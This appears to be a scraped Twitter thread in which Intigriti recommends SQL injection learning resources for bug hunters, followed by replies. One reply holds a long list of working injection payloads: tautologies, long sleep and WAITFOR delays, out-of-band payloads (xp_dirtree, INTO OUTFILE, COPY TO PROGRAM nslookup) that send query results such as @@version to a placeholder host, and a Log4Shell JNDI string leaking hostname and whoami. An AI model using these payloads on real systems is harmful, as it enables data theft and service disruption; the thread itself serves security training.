Intigriti 
If you want to master SQL injections, open this thread!
SQL injection attacks are vulnerabilities that can allow attackers to access ANY data in a victim's database!π€―
A Thread π§΅π
[1οΈβ£] SQL injection by @PortSwigger
When talking about web vulnerabilities, PortSwigger academy is the place to go! Their labs offer a great way to practice your skills as well!
[2οΈβ£] Cheatsheet by @pentest_swissky
With so many different kinds of databases out there, you're definitely going to want a good cheatsheet to quickly look up what you need. PayloadsAllTheThings is perfect for that!
π https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
[3οΈβ£] Hacking with SQLi by @secaura_
This is one of the BEST videos out there on SQL injections. I've never had so much fun whilst learning!
[4οΈβ£] Sqlmap by @bdamele and @stamparm
SQLmap is THE tool when it comes to finding SQL injections. There is just nothing there that comes even close to what sqlmap can do!
π https://sqlmap.org/
[5οΈβ£] Sqlmap in Burp by @codewatchorg
This BurpSuite extension allows you to launch SQLMap scans from within Burp, and it's amazing!
π https://portswigger.net/bappstore/f154175126a04bfe8edc6056f340f52e
[6οΈβ£] Hackademy by @Intigriti and @PascalSec
Intigriti has their own Hackademy explaining vulnerabilities, such as this article on SQL injections. It even comes with a bunch of great videos!
[7οΈβ£] SQLi Prevention by @owasp
Knowing how to prevent vulnerabilities is a great asset for any bug bounty hunters. Spotting secure patterns can greatly help you hunt more efficiently!
π https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
[8οΈβ£] Writeup by @OmarHashem666
One of the best ways to get better at something is to learn from the experts, from the people who have done it. This writeup is a great way to learn!
[9οΈβ£] Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql by @flatt_security
This blog post blew our minds! Flatt_security were able to bypass the escape functions in one of the most used nodeJS SQL libraries!
[π] SQLi Lab on @RealTryHackMe
TryHackMe is a great platform to practice your skills, definitely check out this great room on SQL injections!
That's all for this thread! π§΅
You've learned enough to go out there and find some SQL injections! π©βπ»
Do you know any more resources? Be sure to share them in the comments! π₯
And if you want more of these threads, be sure to leave a like π
DROP\ TABLE Hacker of Earthsea@Intigriti no better place to start than nightmare and writing a SQL shell for blind second order union injection xD
logic
LOAD_FILE('\\%20rrmtypd7aalrc1cnzm4jj7r74yatyi\a')
'
''<insert>`
,
"
""
/
//
<insert>
\
;
';'--
'--
";"--
';
''''''''''''''
\\von4y12mcvxvjl5m4dhthfv0erkv8k:443\a''2
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
" OR 1 = 0 -- -
' OR '1' = '2
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
'''''''''''''UNION%20SELECT%20(select*from(select(sleep(10000)))a)'2
%00
/Γ’Β¦/
@variable
@@variable
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
################
sleep
###########
%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10000)))WUeh)--
'%20AND%20(SELECT%208511%20FROM%20(SELECT(SLEEP(10000)))LEWKM)--%20EWRW
'SLEEP(50)--
'if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10000),0))OR"/ => 3.276 s -- -
-sleep(10000)
'''''''''''''UNION%20SELECT%20SLEEP(10000)'
" (select*from(select(sleep(10000)))a) -- -
'(select*from(select(sleep(10000)))a)'
(select*from(select(sleep(4)))a)
';%20waitfor%20delay%20'0:50:0'--
'; waitfor delay '0:50:0'--
';%20waitfor%20delay%20'0:05:0'--
'%3b%20if%201=1%20waitfor%20delay%20'0%3a09%3a0'--
%7b%22%26where%22%3a%22sleep(10000)%22%7d
################
blind
###########
'''''''''''''%20into%20outfile%20'%5c%5c%7eaaaaaaaaaaaa:443%5c%5cvam'%3b%20--%20'
'''''''''''''exec master..xp_dirtree //aaaaaaaaaaaa:443/a''
'''''''''''''SELECT INTO OUTFILE '\\aaaaaaaaaaaa:443\a''
'''''''''''''copy (SELECT '') to program 'nslookup aaaaaaaaaaaa\f''
'''''''''''''LOAD_FILE('\\aaaaaaaaaaaa:443\a')''
${jndi:ldap://s${hostname}aaaaaaaaaaaa/adas${whoami}sdf.html}
'%20into%20outfile%20'%5c%5c%aaaaaaaaaaaa%5c%5cvam'%3b%20--%20'
'%20into%20outfile%20'%5c%5c%7eaaaaaaaaaaaa:443%5c%5cvam'%3b%20--%20'
exec master..xp_dirtree '//aaaaaaaaaaaa:443/a'
'; WAITFOR DELAY '0:1:10')' --
copy (SELECT '') to program 'nslookup aaaaaaaaaaaa:443\f'
LOAD_FILE('\\ aaaaaaaaaaaa:443\a')
SELECT%20...%20INTO%20OUTFILE%20'\\aaaaaaaaaaaa:443\a'
';LOAD_FILE('\\aaaaaaaaaaaa:443\a')'--
';SELECT%20...%20INTO%20OUTFILE%20'\\aaaaaaaaaaaa\a'--
' into outfile '\~aaaaaaaaaaaa\vam'; -- '
';copy%20('')%20to%20program%20'nslookup%20aaaaaaaaaaaa''--
declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.aaaaaaaaaaaa/a"')
'; declare @p varchar(1024);set @p=(SELECT @@version);exec('master..xp_dirtree "//'+@p+'.aaaaaaaaaaaa:443/a"')' --
'; exec+master..xp_dirtree+'//sql.aaaaaaaaaaaa/a' --
@Intigriti you can also use sqlmaps dns collaborator dns features to find blind SQL injection.
https://portswigger.net/bappstore/e616dc27bf7a4c6598cfeeb70d5ca81c
https://portswigger.net/bappstore/e616dc27bf7a4c6598cfeeb70d5ca81c
@Intigriti my payloads are actually from portswigger cheat sheet, they provide you with all the blocks to construct more advanced stuff. https://portswigger.net/web-security/sql-injection/cheat-sheet
@Intigriti @PortSwigger best place to start